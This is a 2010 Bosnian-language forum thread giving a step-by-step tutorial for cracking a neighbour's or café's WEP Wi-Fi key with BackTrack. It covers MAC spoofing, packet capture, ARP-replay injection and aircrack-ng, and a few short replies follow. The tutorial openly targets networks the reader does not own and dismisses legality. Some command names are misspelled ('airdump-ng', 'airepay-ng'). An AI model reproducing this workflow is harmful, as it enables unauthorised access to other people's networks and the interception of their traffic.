Preskoči na sadržaj
Ista raja. Nova runda.
GAMERZ.ba — REBORN
Diskusija

BackTrack 4 - WEP key cracking tutorial

120 pregleda · 3 odgovora · otvorena 27.11.2010. u 04:09

Našli ste se u situaciji da ste se preselili, uselili u novi stan/kuću? Nemate net jer providerima na Balkanu treba po mjesec-dva da vam donesu obični modem? Ako ste u blizini neke WLAN mreže na ovaj način možete saznati WEP key vašeg susjeda, kafica, radnje, staliveć u par jednostavnih koraka.

PS: Ja sam student, uselio sam se u stan gdje nemam net, naručio sam od BNeta kablovsku TV i internet al' ispada na kraju da nije dostupan na mojoj lokaciji. Dok čekam ove iz H1 morao sam se snaći na drugi način, net od susjeda koristim isključivo za facebook, cs i wow...bez nekih masovnih downloada. Vama preporučujem isto.

I sada:

1. što će vam trebati je BackTrack ( distribucija Linux-a namijenjena testiranju sigurnosti ), njega možete skiniti na slijedećem linku: http://www.backtrack-linux.org/downloads/ ( OS je freeware tako da nije warez il' šta ja znam ) .
2. će vam trebati naravno Wireless uređaj. Ja osobno za BackTrack koristim Gigaset USB Stick 54 koji podržava injection, što je injection napisati cu kasnije. Svi koji posjeduju laptop ili netbook su vec osigurani !
3. iz Windowsa vidite koji router vam daje najbolji signal.

Kada ste nabavili sve potrebne stvari sprzite BackTrack ( nije bitno koja verzija 3, 4, 4-R1. 4-R2 ) na CD/DVD/USB . Ja koristim USB stick jer je brži, CD-ove i DVD-ove vječito gubim il se izgrebu.

Instalacija je na USB je lagana:

Treba vam uređaj sa minimalno 2 GB memorije za 3 i 4 verziju a minimalno 2.5 za R1 i R2 verziju. Skinite .ISO image i pomocu Unetbootin-a instalirajte na USB ( http://unetbootin.sourceforge.net/ ) , za ovo vam i ne trebaju slike...prejednostavno je.
Odaberite Distribution: BackTrack, odaberite koji je uređaj i to je to ( kod nekih jeftinijih USB-ova malo duže traje postupak )

OK, spremi smo za sve.

-Ubacite USB/CD u PC i restartirajte ga, u boot menu-u odaberite vas uređaj na koji ste instalirali OS.

-Otvara vam se prozor gdje možete odabrati u kojem modu da vam se boota BackTrack, odaberite FrameBuffer ( nebitno koja rezolucija ).

-Otvara vam se terminal, u njega upišite "startx" da bi pokrenuli grafičko sučelje.
Kod nekoga će izbaciti error, u tom slučaju upišite "fixvesa" i zatim startx.

-Ušli smo u grafičko sučelje, ništa opasno , u dnu nađite "Terminal" ( crna kockica ) i pokrenite ga. Dobijete nesto kao CMD u Windowsu.

Prelazimo na pronalaženje WEP key-a, za to nam služe air* komande.

1. moramo vidjeti koje je ime našeg uređaja u Linuxu, upišemo:

airmon-ng

Dobijemo popis uređaja, u mom slučaju to je "wlan0"

2. moramo izgasiti "Monitor mode" na tom uređaju, upišemo:

airmon-ng stop wlan0

3. sada ćemo promjeniti MAC ID našeg uređaja, upišemo:

[b]ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0[/b] ( npr. )

Sada smo promjenili naš MAC ID.

4. upaliti "Monitor mode" na uređaju, upišemo

airmon-ng start wlan0

5. došlo je vrijeme da skeniramo Access point-ove ( ubuduće AP ) u blizini, upišemo:

airdump-ng wlan0

Kad nađete željeni AP držite CTRL+C da zaustavite pretraživanje.

6. kopirajte MAC ID ( BSSID - koji je u obliku: XX:XX:XX:XX:XX ) i CHANNEL ( npr. 6 ) od željenog AP-a.

7. vrijeme je da počnemo skupljati pakete i podatke od AP-a, upišemo:

airdump-ng -w test -c ( broj channela ) --bssid ( BSSDI kopirajte ) wlan0

Sada na desktopu se stvori nova datoteka test-01.cap, nemojte je dirati.

Za uspješno crackiranje WEP key-a trebamo prikupiti bar 30000 paketa (#Data), brzina prikupljana ovisi o aktivnosti na toj vezi, npr 5 min gledanja Youtube-a je dovoljno za taj broj paketa. Ako vam #Data ide dobrom brzinom slijedeće korake preskočite.

U slučaju da je veza potpuno neaktivna moramo imati uređaj koji podržava "injection", listu podržanih uređaja možete naći na: http://www.backtrack-linux.org/forums/
Ili sa naredbom: aireplay-ng -9 wlan0

1. moramo se autorizirati na AP-u, upišemo:

aireplay-ng -1 0 -a (BSSID) wlan0

Ako vam piše da je autoritizacija uspjela, injection radi možemo na slijedeći korak.

2. uraditi injection podataka, upišemo

airepay-ng -3 -b (BSSID) wlan0

Ovo bi trebalo ubrzati/pokreniti prikupljanje podataka.

Skupili smo 30000 podataka ( inače je nekada i 5000 dovoljno, ali sa 30000 je 100% ), počinjemo sa crackiranjem WEP keya, upišemo:

aircrack-ng test-01.cap

Nekih 2-3 min. će biti dovoljno da vam nađe ključ, ako i sa 30000 paketa ne nađe pokušajte sa još 5000.

Kad nađete key uklonite : iz toga i imate key.

I to je to !

Slike nisam u mogućnosti postavljati sa Linux-a, pa ću vam samo par staviti sa mobitela...a i mislim da i nisu potrebne, sve sam opisao na što lakši način i objasnio.

Mala pomoć: nemožete koristiti nego US keyboard layout: : je Shift + Č , - je ?, paste je shift + instert.

Moji rezultati:

Ovo nije nikakav c/p, sat vremena sam potrošio na pisanje tutorijala. Malo ih je korisnih i ispravnih, ovo je najlakši i najuspješniji način. Ne radite ništa ilegalno jer u nas ne postoji zakon...što je zakon! Ako je neprimjereno za ovaj poratal ispričavam se ! Studiram informacijske tehnologije i ovo mi je jako zanimljivo, inače sam se igrao sa Linux-ima, tako da očekujte jos tutoriala. Ako ima koja gramatička greška nemojte zamjeriri

Next tutorial: Kako od routera napraviti wireless antenu! Coming Soon!

For emag.ba Marko ''e.mouse'' Oreč.
(L) BackTrack 

Lijepo napravljenoooo 
Bravo kralju baš sam ovako nešto tražio 
ToTalna pogreska je sto si ovakav TuTorial stavio na g.ba ... tutorial jeste dobar , ali mislim da ovo ii nije bas mjesto za takvo nest , ispavite me ako grijesim :|

Prijavi se da bi odgovorio/la na ovu temu.